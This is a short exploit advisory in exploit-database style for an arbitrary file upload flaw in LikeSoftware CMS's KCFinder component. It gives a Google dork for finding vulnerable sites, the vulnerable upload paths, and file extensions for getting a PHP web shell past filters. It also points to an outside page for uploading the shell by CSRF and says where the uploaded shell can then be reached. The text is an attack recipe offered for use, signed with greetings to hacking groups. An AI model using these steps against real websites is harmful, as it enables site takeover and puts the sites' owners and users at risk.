# Exploit Title: LikeSoftware CMS - Arbitrary File Upload # Google Dork: inurl:/painel/kcfinder/upload/ (For easy you can using Google Search Image) # Date: 2018-05-24 # Exploit Author: Mr.7z # Vendor Homepage: http://www.likesoftware.com.br/ # Software Link: - # Tested on: Windows 10 64bit (Home Edition) Exploit: /painel/kcfinder/browse.php or /painel/kcfinder/upload.php ext shell: php.5 php,ndsxf php.pjpeg dll You can Upload shell with CSRF Online -> http://dontpanic-its.me/kcfinder.php Shell Locate: target.com/painel/kcfinder/upload/files/shell.php -Thx to XaiSyndicate - Family Attack Cyber - HunterSec-Team - Typical Idiot Security - Exilie's Team